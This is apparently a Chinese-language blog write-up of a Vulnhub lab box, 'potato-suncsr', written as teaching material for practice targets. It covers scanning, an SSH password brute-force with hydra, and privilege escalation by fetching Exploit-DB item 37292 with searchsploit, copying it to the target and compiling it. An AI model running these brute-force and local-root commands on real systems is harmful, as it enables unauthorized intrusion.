靶场实战 Vulnhub

potato-suncsr

potato-suncsr

Posted by Kyon-H on July 12, 2025

1. 信息搜集

扫描发现主机 192.168.163.133

image.png

扫描端口

image.png

访问80端口,未发现有效信息,目录扫描发现 /info.php

whatweb 未发现信息

2. SSH爆破

1

hydra -l potato -P 字典2/字典.txt -vV ssh://192.168.163.133:7120

image.png

1

ssh -p 7120 potato@192.168.163.133

3. 提权

进入目标机后,尝试sudo, find 提权失败,查看系统信息

1
2

cat /etc/issue
uname -a

image.png

搜索相关漏洞

1

searchsploit ubuntu 14.04

image.png

1
2
3
4

# 复制文件
searchsploit -m 37292
# 传输到目标机
scp -P 7120 37292.c potato@192.168.163.133:~

在目标机上编译并执行

1
2

gcc 37292.c
./a.out

image.png

找到flag image.png

CATALOG
    FEATURED TAGS
    DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护